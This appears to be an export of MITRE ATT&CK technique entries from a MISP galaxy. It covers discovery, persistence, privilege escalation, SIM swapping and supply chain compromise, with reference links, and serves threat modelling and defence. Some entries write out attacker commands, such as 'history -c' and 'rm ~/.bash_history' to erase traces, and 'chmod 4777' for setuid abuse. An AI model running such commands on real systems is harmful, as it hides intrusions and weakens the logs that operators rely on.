On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as show clock detail can be used to see the current time configuration.(Citation: show_clock_detail_cisco_cmd)

This information could be useful for performing other techniques, such as executing a file with a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)(Citation: RSA EU12 They’re Inside), or to discover locality information based on time zone to assist in victim targeting (i.e. [System Location Discovery](https://attack.mitre.org/techniques/T1614)). Adversaries may also use knowledge of system time as part of a time bomb, or delaying execution until a specified date/time.(Citation: AnyRun TimeBomb)

The tag is: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124"

Table 5849. Table References

Links

https://any.run/cybersecurity-blog/time-bombs-malware-with-delayed-execution/

https://attack.mitre.org/techniques/T1124

https://msdn.microsoft.com/ms724961.aspx

https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s2.html#wp1896741674

https://www.rsaconference.com/writable/presentations/file_upload/ht-209_rivner_schwartz.pdf

Determine strategic target - T1241

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1241).

An adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine strategic target - T1241"

Table 5850. Table References

Links

https://attack.mitre.org/techniques/T1241

Browser Information Discovery - T1217

Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)

Browser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.

Specific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., %APPDATA%/Google/Chrome).(Citation: Chrome Roaming Profiles)

The tag is: misp-galaxy:mitre-attack-pattern="Browser Information Discovery - T1217"

Table 5851. Table References

Links

https://attack.mitre.org/techniques/T1217

https://support.google.com/chrome/a/answer/7349337

https://www.kaspersky.com/blog/browser-data-theft/27871/

Netsh Helper DLL - T1128

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.

Adversaries can use netsh.exe with helper DLLs to proxy execution of arbitrary code in a persistent manner when netsh.exe is executed automatically with another Persistence technique or if other persistent software is present on the system that executes netsh.exe as part of its normal functionality. Examples include some VPN software that invoke netsh.exe. (Citation: Demaske Netsh Persistence)

Proof of concept code exists to load Cobalt Strike’s payload using netsh.exe helper DLLs. (Citation: Github Netsh Helper CS Beacon)

The tag is: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1128"

Table 5852. Table References

Links

https://attack.mitre.org/techniques/T1128

https://github.com/outflankbv/NetshHelperBeacon

https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html

https://technet.microsoft.com/library/bb490939.aspx

Remote Access Software - T1219

An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as VNC, Team Viewer, AnyDesk, ScreenConnect, LogMein, AmmyyAdmin, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)

Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.

Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.

Installation of many remote access software may also include persistence (e.g., the software’s installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)).

The tag is: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219"

Table 5853. Table References

Links

https://attack.mitre.org/techniques/T1219

https://blog.crysys.hu/2013/03/teamspy/

https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf

https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf

External Remote Services - T1133

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)

Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation.

Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware)

The tag is: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133"

Table 5854. Table References

Links

https://attack.mitre.org/techniques/T1133

https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html

https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/

Obfuscation or cryptography - T1313

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1313).

Obfuscation is the act of creating communications that are more difficult to understand. Encryption transforms the communications such that it requires a key to reverse the encryption. (Citation: FireEyeAPT28)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscation or cryptography - T1313"

Table 5855. Table References

Links

https://attack.mitre.org/techniques/T1313

Access Token Manipulation - T1134

Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.

An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)

Any standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.

The tag is: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134"

Table 5856. Table References

Links

https://attack.mitre.org/techniques/T1134

https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx

https://pentestlab.blog/2017/04/03/token-manipulation/

https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf

Account Access Removal - T1531

Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)

In Windows, [Net](https://attack.mitre.org/software/S0039) utility, <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the <code>passwd</code> utility may be used to change passwords. Accounts could also be disabled by Group Policy.

Adversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective.

The tag is: misp-galaxy:mitre-attack-pattern="Account Access Removal - T1531"

Table 5857. Table References

Links

https://attack.mitre.org/techniques/T1531

https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/

https://www.carbonblack.com/2019/03/22/tau-threat-intelligence-notification-lockergoga-ransomware/

Network Share Discovery - T1135

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the <code>net view \\\\remotesystem</code> command. It can also be used to query shared drives on the local system using <code>net share</code>. For macOS, the <code>sharing -l</code> command lists all shared points used for smb services.

The tag is: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135"

Table 5858. Table References

Links

https://attack.mitre.org/techniques/T1135

https://en.wikipedia.org/wiki/Shared_resource

https://technet.microsoft.com/library/cc770880.aspx

Office Application Startup - T1137

Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins.

A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)

The tag is: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137"

Table 5859. Table References

Links

https://attack.mitre.org/techniques/T1137

https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/

https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack

https://github.com/sensepost/notruler

https://github.com/sensepost/ruler

https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746

https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943

Dynamic Data Exchange - T1173

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)

Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1173"

Table 5860. Table References

Links

https://attack.mitre.org/techniques/T1173

https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/

https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021

https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee

https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

https://technet.microsoft.com/library/security/4053440

https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/

https://www.contextis.com/blog/comma-separated-vulnerabilities

Obfuscate operational infrastructure - T1318

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1318).

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: DellComfooMasters)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate operational infrastructure - T1318"

Table 5861. Table References

Links

https://attack.mitre.org/techniques/T1318

SIM Card Swap - T1451

An adversary could convince the mobile network operator (e.g. through social networking, forged identification, or insider attacks performed by trusted employees) to issue a new SIM card and associate it with an existing phone number and account.(Citation: NYGov-Simswap)(Citation: Motherboard-Simswap2) The adversary could then obtain SMS messages or hijack phone calls intended for someone else.(Citation: Betanews-Simswap)

One use case is intercepting authentication messages or phone calls to obtain illicit access to online banking or other online accounts, as many online services allow account password resets by sending an authentication code over SMS to a phone number associated with the account.(Citation: Guardian-Simswap)(Citation: Motherboard-Simswap1)(Citation: Krebs-SimSwap)(Citation: TechCrunch-SimSwap)

The tag is: misp-galaxy:mitre-attack-pattern="SIM Card Swap - T1451"

Table 5862. Table References

Links

http://betanews.com/2016/02/12/everything-you-need-to-know-about-sim-swap-scams/

http://www.dos.ny.gov/consumerprotection/scams/att-sim.html

https://attack.mitre.org/techniques/T1451

https://krebsonsecurity.com/2018/05/t-mobile-employee-made-unauthorized-sim-swap-to-steal-instagram-account/

https://motherboard.vice.com/en_us/article/3ky5a5/criminals-recruit-telecom-employees-sim-swapping-port-out-scam

https://motherboard.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-22.html

https://techcrunch.com/2017/08/23/i-was-hacked/

https://www.theguardian.com/money/2016/apr/16/sim-swap-fraud-mobile-banking-fraudsters

URL Scheme Hijacking - T1415

An iOS application may be able to maliciously claim a URL scheme, allowing it to intercept calls that are meant for a different application(Citation: FireEye-Masque2)(Citation: Dhanjani-URLScheme). This technique, for example, could be used to capture OAuth authorization codes(Citation: IETF-PKCE) or to phish user credentials(Citation: MobileIron-XARA).

The tag is: misp-galaxy:mitre-attack-pattern="URL Scheme Hijacking - T1415"

Table 5863. Table References

Links

http://www.dhanjani.com/blog/2010/11/insecure-handling-of-url-schemes-in-apples-ios.html

https://attack.mitre.org/techniques/T1415

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-10.html

https://tools.ietf.org/html/rfc7636

https://www.fireeye.com/blog/threat-research/2015/02/ios_masque_attackre.html

https://www.mobileiron.com/en/smartwork-blog/ios-url-scheme-hijacking-xara-attack-analysis-and-countermeasures

Clear Command History - T1146

In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they’ve done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user’s home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they’ve used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, <code>rm ~/.bash_history</code>.

The tag is: misp-galaxy:mitre-attack-pattern="Clear Command History - T1146"

Table 5864. Table References

Links

https://attack.mitre.org/techniques/T1146

System Location Discovery - T1614

Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as <code>GetLocaleInfoW</code> can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance’s availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)

Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)

The tag is: misp-galaxy:mitre-attack-pattern="System Location Discovery - T1614"

Table 5865. Table References

Links

https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf

https://attack.mitre.org/techniques/T1614

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html

https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows

https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/

https://securelist.com/transparent-tribe-part-1/98127/

https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/

Password Filter DLL - T1174

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.

Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Password Filter DLL - T1174"

Table 5866. Table References

Links

http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html

https://attack.mitre.org/techniques/T1174

https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/

Device Type Discovery - T1419

On Android, device type information is accessible to apps through the android.os.Build class (Citation: Android-Build). Device information could be used to target privilege escalation exploits.

The tag is: misp-galaxy:mitre-attack-pattern="Device Type Discovery - T1419"

Table 5867. Table References

Links

https://attack.mitre.org/techniques/T1419

https://developer.android.com/reference/android/os/Build

Spearphishing via Service - T1194

Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target’s interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that’s running in an environment. The adversary can then send malicious links or attachments through these services.

A common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it’s something they were expecting. If the payload doesn’t work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1194"

Table 5868. Table References

Links

https://attack.mitre.org/techniques/T1194

https://capec.mitre.org/data/definitions/163.html

Cloud Administration Command - T1651

Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020)

If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Administration Command - T1651"

Table 5869. Table References

Links

https://attack.mitre.org/techniques/T1651

https://docs.aws.amazon.com/systems-manager/latest/userguide/run-command.html

https://learn.microsoft.com/en-us/azure/virtual-machines/run-command-overview

https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d

https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/

Group Policy Discovery - T1615

Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path \<DOMAIN>\SYSVOL\<DOMAIN>\Policies\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)

Adversaries may use commands such as <code>gpresult</code> or various publicly available PowerShell functions, such as <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGroup</code>, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.

The tag is: misp-galaxy:mitre-attack-pattern="Group Policy Discovery - T1615"

Table 5870. Table References

Links

https://adsecurity.org/?p=2716

https://attack.mitre.org/techniques/T1615

https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult

https://github.com/PowerShellEmpire/Empire

Malicious Shell Modification - T1156

Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User shells execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command line interface or remotely logs in (such as SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use <code>/etc/profile</code> when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.

Adversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the <code>/etc/profile</code> and <code>/etc/profile.d</code> files (Citation: intezer-kaiji-malware). These files require root permissions and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into <code>~/.bash_profile</code>, <code>~/.bash_login</code>, or <code>~/.profile</code> (Rocke) which are sourced when a user opens a command line interface or connects remotely. Adversaries often use ~/.bash_profile since the system only executes the first file that exists in the listed order. Adversaries have also leveraged the <code>~/.bashrc</code> file (Tsunami, Rocke, Linux Rabbit, Magento) which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command line interface. Some malware targets the termination of a program to trigger execution (Cannon), adversaries can use the <code>~/.bash_logout</code> file to execute malicious commands at the end of a session(Pearl_shellbot).

For macOS, the functionality of this technique is similar but leverages zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using <code>/etc/profile</code>, <code>/etc/zshenv</code>, <code>/etc/zprofile</code>, and <code>/etc/zlogin</code>. The login shell then configures the user environment with <code>~/.zprofile</code> and <code>~/.zlogin</code>. The interactive shell uses the <code>~/.zshrc<code> to configure the user environment. Upon exiting, <code>/etc/zlogout</code> and <code>~/.zlogout</code> are executed. For legacy programs, macOS executes <code>/etc/bashrc</code> on startup.

The tag is: misp-galaxy:mitre-attack-pattern="Malicious Shell Modification - T1156"

Table 5871. Table References

Links

https://attack.mitre.org/techniques/T1156

https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

Browser Session Hijacking - T1185

Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)

A specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as <code>SeDebugPrivilege</code> and/or high-integrity/administrator rights.

Another example involves pivoting browser traffic from the adversary’s browser through the user’s browser by setting up a proxy which will redirect web traffic. This does not alter the user’s traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)

The tag is: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185"

Table 5872. Table References

Links

https://attack.mitre.org/techniques/T1185

https://en.wikipedia.org/wiki/Man-in-the-browser

https://web.archive.org/web/20210825130434/https://cobaltstrike.com/downloads/csmanual38.pdf

https://www.cobaltstrike.com/help-browser-pivoting

https://www.icebrg.io/blog/malicious-chrome-extensions-enable-criminals-to-impact-over-half-a-million-users-and-global-businesses

Supply Chain Compromise - T1195

Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.

Supply chain compromise can take place at any stage of the supply chain including:

  • Manipulation of development tools

  • Manipulation of a development environment

  • Manipulation of source code repositories (public or private)

  • Manipulation of source code in open-source dependencies

  • Manipulation of software update/distribution mechanisms

  • Compromised/infected system images (multiple cases of removable media infected at the factory)(Citation: IBM Storwize)(Citation: Schneider Electric USB Malware)

  • Replacement of legitimate software with modified versions

  • Sales of modified/counterfeit products to legitimate distributors

  • Shipment interdiction

While supply chain compromise can impact any component of hardware or software, adversaries looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.(Citation: Avast CCleaner3 2018)(Citation: Microsoft Dofoil 2018)(Citation: Command Five SK 2011) Targeting may be specific to a desired victim set or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Symantec Elderwood Sept 2012)(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011) Popular open source projects that are used as dependencies in many applications may also be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise)

The tag is: misp-galaxy:mitre-attack-pattern="Supply Chain Compromise - T1195"

Table 5873. Table References

Links

https://attack.mitre.org/techniques/T1195

https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146&myns=s028&mynp=OCSTHGUJ&mynp=OCSTLM5A&mynp=OCSTLM6B&mynp=OCHW206&mync=E&cm_sp=s028--OCSTHGUJ-OCSTLM5A-OCSTLM6B-OCHW206--E

https://www.commandfive.com/papers/C5_APT_SKHack.pdf

https://www.se.com/ww/en/download/document/SESN-2018-236-01/

https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets

Setuid and Setgid - T1166

When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an "s" instead of an "x" when viewing a file’s attributes via <code>ls -l</code>. The <code>chmod</code> program can set these bits with via bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>.

An adversary can take advantage of this to either do a shell escape or exploit a vulnerability in an application with the setsuid or setgid bits to get code running in a different user’s context. Additionally, adversaries can use this mechanism on their own malware to make sure they’re able to execute in elevated contexts in the future (Citation: OSX Keydnap malware).

The tag is: misp-galaxy:mitre-attack-pattern="Setuid and Setgid - T1166"

Table 5874. Table References

Links

http://man7.org/linux/man-pages/man2/setuid.2.html

